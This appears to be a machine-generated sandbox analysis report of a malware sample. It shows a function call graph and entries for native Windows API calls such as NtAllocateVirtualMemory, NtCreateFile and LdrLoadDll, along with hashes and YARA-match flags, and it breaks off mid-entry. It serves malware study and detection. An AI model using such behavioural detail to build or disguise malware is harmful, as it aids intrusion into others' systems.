96997->96999 96998->96613 96999->96998 97001 41a23c 97000->97001 97002 41af20 LdrLoadDll 97000->97002 97006 1a22ea0 LdrInitializeThunk 97001->97006 97002->97001 97003 41a25b 97003->96617 97005->96993 97006->97003 97008 40b1e0 97007->97008 97009 40b030 LdrLoadDll 97008->97009 97010 40b1f4 97009->97010 97010->96551 97012 40ae41 97011->97012 97013 40ae3d 97011->97013 97014 40ae5a 97012->97014 97015 40ae8c 97012->97015 97013->96553 97057 419c90 LdrLoadDll 97014->97057 97058 419c90 LdrLoadDll 97015->97058 97017 40ae9d 97017->96553 97019 40ae7c 97019->96553 97021 40f490 3 API calls 97020->97021 97022 4143b6 97020->97022 97021->97022 97022->96555 97059 4087a0 97023->97059 97026 408a9d 97026->96557 97027 4087a0 19 API calls 97028 408a8a 97027->97028 97028->97026 97077 40f700 10 API calls 97028->97077 97031 41af20 LdrLoadDll 97030->97031 97032 41a4dc 97031->97032 97197 1a22e80 LdrInitializeThunk 97032->97197 97033 40c312 97035 40f490 97033->97035 97036 40f4ad 97035->97036 97198 419f80 97036->97198 97039 40f4f5 97039->96561 97040 419fd0 2 API calls 97041 40f51e 97040->97041 97041->96561 97043 41af20 LdrLoadDll 97042->97043 97044 419fec 97043->97044 97204 1a22d10 LdrInitializeThunk 97044->97204 97045 40c375 97045->96567 97045->96570 97048 41af20 LdrLoadDll 97047->97048 97049 41a03c 97048->97049 97205 1a22d30 LdrInitializeThunk 97049->97205 97050 40c449 97050->96578 97053 41af20 LdrLoadDll 97052->97053 97054 419dfc 97053->97054 97206 1a22fb0 LdrInitializeThunk 97054->97206 97055 40c49c 97055->96582 97057->97019 97058->97017 97060 407ea0 4 API calls 97059->97060 97074 4087ba 97060->97074 97061 408a49 97061->97026 97061->97027 97062 408a3f 97063 408160 2 API calls 97062->97063 97063->97061 97066 419ec0 2 API calls 97066->97074 97070 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97070->97074 97073 419de0 2 API calls 97073->97074 97074->97061 97074->97062 97074->97066 97074->97070 97074->97073 97075 41a450 LdrLoadDll NtClose 97074->97075 97078 419cd0 97074->97078 97081 4085d0 97074->97081 97093 40f5e0 LdrLoadDll NtClose 97074->97093 97094 419d50 LdrLoadDll 97074->97094 97095 419d80 LdrLoadDll 97074->97095 97096 419e10 LdrLoadDll 97074->97096 97097 4083a0 97074->97097 97113 405f60 LdrLoadDll 97074->97113 97075->97074 97077->97026 97079 41af20 LdrLoadDll 97078->97079 97080 419cec 97079->97080 97080->97074 97082 4085e6 97081->97082 97114 419840 97082->97114 97084 408771 97084->97074 97085 4085ff 97085->97084 97135 4081a0 97085->97135 97087 4086e5 97087->97084 97088 4083a0 11 API calls 97087->97088 97089 408713 97088->97089 97089->97084 97090 419ec0 2 API calls 97089->97090 97091 408748 97090->97091 97091->97084 97092 41a4c0 2 API calls 97091->97092 97092->97084 97093->97074 97094->97074 97095->97074 97096->97074 97098 4083c9 97097->97098 97176 408310 97098->97176 97101 41a4c0 2 API calls 97102 4083dc 97101->97102 97102->97101 97103 408467 97102->97103 97105 408462 97102->97105 97184 40f660 97102->97184 97103->97074 97104 41a450 2 API calls 97106 40849a 97104->97106 97105->97104 97106->97103 97107 419cd0 LdrLoadDll 97106->97107 97108 4084ff 97107->97108 97108->97103 97188 419d10 97108->97188 97110 408563 97110->97103 97111 414a40 8 API calls 97110->97111 97112 4085b8 97111->97112 97112->97074 97113->97074 97115 41bf50 2 API calls 97114->97115 97116 419857 97115->97116 97142 409310 97116->97142 97118 419872 97119 4198b0 97118->97119 97120 419899 97118->97120 97123 41bd00 2 API calls 97119->97123 97121 41bd80 2 API calls 97120->97121 97122 4198a6 97121->97122 97122->97085 97124 4198ea 97123->97124 97125 41bd00 2 API calls 97124->97125 97126 419903 97125->97126 97132 419ba4 97126->97132 97148 41bd40 97126->97148 97129 419b90 97130 41bd80 2 API calls 97129->97130 97131 419b9a 97130->97131 97131->97085 97133 41bd80 2 API calls 97132->97133 97134 419bf9 97133->97134 97134->97085 97136 40829f 97135->97136 97137 4081b5 97135->97137 97136->97087 97137->97136 97138 414a40 8 API calls 97137->97138 97139 408222 97138->97139 97140 41bd80 2 API calls 97139->97140 97141 408249 97139->97141 97140->97141 97141->97087 97143 409335 97142->97143 97144 40ace0 LdrLoadDll 97143->97144 97145 409368 97144->97145 97147 40938d 97145->97147 97151 40cf10 97145->97151 97147->97118 97169 41a540 97148->97169 97152 40cf3c 97151->97152 97153 41a1a0 LdrLoadDll 97152->97153 97154 40cf55 97153->97154 97155 40cf5c 97154->97155 97162 41a1e0 97154->97162 97155->97147 97159 40cf97 97160 41a450 2 API calls 97159->97160 97161 40cfba 97160->97161 97161->97147 97163 41a1fc 97162->97163 97164 41af20 LdrLoadDll 97162->97164 97168 1a22ca0 LdrInitializeThunk 97163->97168 97164->97163 97165 40cf7f 97165->97155 97167 41a7d0 LdrLoadDll 97165->97167 97167->97159 97168->97165 97170 41a549 97169->97170 97171 41af20 LdrLoadDll 97170->97171 97172 41a55c 97171->97172 97175 1a22f90 LdrInitializeThunk 97172->97175 97173 419b89 97173->97129 97173->97132 97175->97173 97177 40831e 97176->97177 97178 40ace0 LdrLoadDll 97177->97178 97179 408343 97178->97179 97180 414e40 LdrLoadDll 97179->97180 97181 408353 97180->97181 97182 40835c PostThreadMessageW 97181->97182 97183 408370 97181->97183 97182->97183 97183->97102 97185 40f673 97184->97185 97191 419e50 97185->97191 97189 419d2c 97188->97189 97190 41af20 LdrLoadDll 97188->97190 97189->97110 97190->97189 97192 419e6c 97191->97192 97193 41af20 LdrLoadDll 97191->97193 97196 1a22dd0 LdrInitializeThunk 97192->97196 97193->97192 97194 40f69e 97194->97102 97196->97194 97197->97033 97199 419f9c 97198->97199 97200 41af20 LdrLoadDll 97198->97200 97203 1a22f30 LdrInitializeThunk 97199->97203 97200->97199 97201 40f4ee 97201->97039 97201->97040 97203->97201 97204->97045 97205->97050 97206->97055 97209 1a22ad0 LdrInitializeThunk

                                                                                                                              Executed Functions

                                                                                                                              Function 0041A3D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
                                                                                                                              APIs
                                                                                                                              • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID: !JA$bMA$bMA
                                                                                                                              • API String ID: 2738559852-4222312340
                                                                                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                              • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                                                                                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                              • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                                                                                                              Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 252 40ace0-40ad09 call 41cc10 255 40ad0b-40ad0e 252->255 256 40ad0f-40ad1d call 41d030 252->256 259 40ad2d-40ad3e call 41b460 256->259 260 40ad1f-40ad2a call 41d2b0 256->260 265 40ad40-40ad54 LdrLoadDll 259->265 266 40ad57-40ad5a 259->266 260->259 265->266
                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0
                                                                                                                              • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                              • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                                                                                                                              • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                              • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                                                                                                                              Function 0041A31B Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 267 41a31b-41a371 call 41af20 NtCreateFile
                                                                                                                              APIs
                                                                                                                              • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 823142352-0
                                                                                                                              • Opcode ID: 8f3e8a6209b4b00c98ddcbbd338c2fca887c2b184796bbc1a5fb50fcfb101bb5
                                                                                                                              • Instruction ID: 6af5a2f632afc800a517bcec4ba0904026498e808f2fa26a1e036ec25215fe71
                                                                                                                              • Opcode Fuzzy Hash: 8f3e8a6209b4b00c98ddcbbd338c2fca887c2b184796bbc1a5fb50fcfb101bb5
                                                                                                                              • Instruction Fuzzy Hash: 9601DDB2201208BFCB08CF98D895EEB77A9BF8C354F118209BA0993241C630E8118BA4
                                                                                                                              Function 0041A320 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 270 41a320-41a336 271 41a33c-41a371 NtCreateFile 270->271 272 41a337 call 41af20 270->272 272->271
                                                                                                                              APIs
                                                                                                                              • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 823142352-0
                                                                                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                              • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                                                                                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                              • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                              Function 0041A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 273 41a500-41a516 274 41a51c-41a53d NtAllocateVirtualMemory 273->274 275 41a517 call 41af20 273->275 275->274
                                                                                                                              APIs
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2167126740-0
                                                                                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                              • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                                                                                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                              • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                              Function 0041A4FA Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 279 41a4fa-41a53d call 41af20 NtAllocateVirtualMemory
                                                                                                                              APIs
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2167126740-0
                                                                                                                              • Opcode ID: 5b9e2d1a5edd79be2a2d903e8bd7a354ba4826bc616cee076fd0fa7e3af18abb
                                                                                                                              • Instruction ID: 838264de32c343dc065a207e36573fb7d5625846ea2776db14e94fc7a3fc012b
                                                                                                                              • Opcode Fuzzy Hash: 5b9e2d1a5edd79be2a2d903e8bd7a354ba4826bc616cee076fd0fa7e3af18abb
                                                                                                                              • Instruction Fuzzy Hash: 99F01CB6200108AFDB14DF89DC55EEB77ADAF88354F154559FE099B241C630E821CBB4
                                                                                                                              Function 0041A44A Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3535843008-0
                                                                                                                              • Opcode ID: 44f4301a8312fb7a1a721bfc725db4469673ce8342a651448e83db7c9f097d31
                                                                                                                              • Instruction ID: d7bf46046ebde09780b79a3501cd22a4181f43e7f5ac81893e4249d29ed6ce1f
                                                                                                                              • Opcode Fuzzy Hash: 44f4301a8312fb7a1a721bfc725db4469673ce8342a651448e83db7c9f097d31
                                                                                                                              • Instruction Fuzzy Hash: A6E0C277240210AFD710EBE4DC45FD73BA8EF48728F154599BA589B352C234F94087D0
                                                                                                                              Function 0041A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3535843008-0
                                                                                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                              • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                                                                                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                              • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                                                                                                                              Function 01A22BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 54cd0c5b3911f9edee34cb03bbb3024828b56e26afa84a8156e3ab249c3f7029
                                                                                                                              • Instruction ID: d39da94478d81ee03d17c5b9ffbf2e6b83273aef61be315275a60b5ec923aa98
                                                                                                                              • Opcode Fuzzy Hash: 54cd0c5b3911f9edee34cb03bbb3024828b56e26afa84a8156e3ab249c3f7029
                                                                                                                              • Instruction Fuzzy Hash: 8F90023160140802D1807158440474A001597D1301F96C115B0029654DCA198B5A77A1
                                                                                                                              Function 01A22B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 6b8a97b17ced657a600dc228a5c9ead60d5afa0601190f09ddbeb10201cdd7b0
                                                                                                                              • Instruction ID: 27db5ababc355a92d83e824708e19b4265f1b49a1603201a947dbf5172090a6a
                                                                                                                              • Opcode Fuzzy Hash: 6b8a97b17ced657a600dc228a5c9ead60d5afa0601190f09ddbeb10201cdd7b0
                                                                                                                              • Instruction Fuzzy Hash: 0690026160240003410571584414716401A97E0201F56C121F1018590DC52989927225
                                                                                                                              Function 01A22AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: a9063aa92a2358a00e48289e317f44ba7bdc60c3bad90dbebb8f25d5a68dc9ec
                                                                                                                              • Instruction ID: bf96ee63d46f7e76e00365c3d7016613b303d9348e88f9404f48af9d9f1eedfe
                                                                                                                              • Opcode Fuzzy Hash: a9063aa92a2358a00e48289e317f44ba7bdc60c3bad90dbebb8f25d5a68dc9ec
                                                                                                                              • Instruction Fuzzy Hash: DB900435711400030105F55C07047070057D7D5351757C131F101D550CD735CD737331
                                                                                                                              Function 01A22DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 21bb61c977423f28b57d38df5f8ecee73aa843a39a6c09372a5c6651e193abef
                                                                                                                              • Instruction ID: d40e5ee7e6567211ce72c3aa3f8f2c7671f41eb231b616248e0bec625adc96e5
                                                                                                                              • Opcode Fuzzy Hash: 21bb61c977423f28b57d38df5f8ecee73aa843a39a6c09372a5c6651e193abef
                                                                                                                              • Instruction Fuzzy Hash: 4090023160140413D11171584504707001997D0241F96C512B0428558DD65A8A53B221
                                                                                                                              Function 01A22DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 65fb186c9a0cff96255c3ba435a04406155e1625779291de4d627712075f0961
                                                                                                                              • Instruction ID: 75724a6374dbcf6ac54fe4e1a3e69f1c88db8a02fba0ba506a94422fde050f7f
                                                                                                                              • Opcode Fuzzy Hash: 65fb186c9a0cff96255c3ba435a04406155e1625779291de4d627712075f0961
                                                                                                                              • Instruction Fuzzy Hash: 31900221642441525545B15844046074016A7E0241B96C112B1418950CC52A9957E721
                                                                                                                              Function 01A22D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: b389484a534caa934c474612c2f5bb80d6c59a8f771b9333a90b51f0cacc7c21
                                                                                                                              • Instruction ID: a474420a9d9a296e34d5ec9cc4839fa19b5b7ddac1e4642167f0e7c76a4c27b1
                                                                                                                              • Opcode Fuzzy Hash: b389484a534caa934c474612c2f5bb80d6c59a8f771b9333a90b51f0cacc7c21
                                                                                                                              • Instruction Fuzzy Hash: 9B90022170140003D140715854187064015E7E1301F56D111F0418554CD91989576322
                                                                                                                              Function 01A22D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 29f5e6604fae9e66a4ee782b6b09fb34c558ce05fe6daf090f931cea20577b15
                                                                                                                              • Instruction ID: e59daad0b45ab05832cdd42cf8356a111a4aafc22c6b3bd65848a07cfd5be560
                                                                                                                              • Opcode Fuzzy Hash: 29f5e6604fae9e66a4ee782b6b09fb34c558ce05fe6daf090f931cea20577b15
                                                                                                                              • Instruction Fuzzy Hash: 0A90022961340002D1807158540870A001597D1202F96D515B0019558CC919896A6321
                                                                                                                              Function 01A22CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: a12e8fa2e0c6589e7b9a9cb1bc82fe9cbea2ec92ba1ce2f1b7f3ba0cea39d09f
                                                                                                                              • Instruction ID: 368fbd4991cc3ac5c49f4253dea178d01d551c7cf3260ff5fc23ef01099a2010
                                                                                                                              • Opcode Fuzzy Hash: a12e8fa2e0c6589e7b9a9cb1bc82fe9cbea2ec92ba1ce2f1b7f3ba0cea39d09f
                                                                                                                              • Instruction Fuzzy Hash: 9E90023160140402D10075985408746001597E0301F56D111B5028555EC66989927231
                                                                                                                              Function 01A22C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 54e6a49b9fb8295bc3ede5f177b96a627e0237f8f84ef550913c0cdd58d93062
                                                                                                                              • Instruction ID: a7af68e280d3668a7584b7941adeffe58d976fd3bf3b5a4b0198f80521615792
                                                                                                                              • Opcode Fuzzy Hash: 54e6a49b9fb8295bc3ede5f177b96a627e0237f8f84ef550913c0cdd58d93062
                                                                                                                              • Instruction Fuzzy Hash: 1690023160148802D1107158840474A001597D0301F5AC511B4428658DC69989927221
                                                                                                                              Function 01A22FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 8949c07783033be8874902c5e781a7c46706c381aa1126b49be1074c5a16d67b
                                                                                                                              • Instruction ID: 2167dd51f1e39d47906726c5cdda8df23b187a1793f4b55ff7c05ce65b76dd58
                                                                                                                              • Opcode Fuzzy Hash: 8949c07783033be8874902c5e781a7c46706c381aa1126b49be1074c5a16d67b
                                                                                                                              • Instruction Fuzzy Hash: 88900221A0140042414071688844A064015BBE1211B56C221B099C550DC55D89666765
                                                                                                                              Function 01A22F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
